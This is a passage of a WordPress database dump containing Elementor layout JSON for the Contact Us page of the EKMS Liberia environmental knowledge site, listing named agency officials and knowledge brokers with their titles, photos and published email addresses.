lements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23267,3375,'_elementor_edit_mode','builder'),(23268,3375,'_elementor_template_type','wp-page'),(23269,3375,'_elementor_version','3.0.16'),(23270,3375,'_wp_page_template','default'),(23271,3375,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kawusu Toure<\\/strong><br \\/>Assistant Manager - Compliance and Enforcement, ESIA, EPA<br \\/>kawumtoure@gmail.com<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><\\/p><p>Director, MOA<\\/p><p><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager, LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}]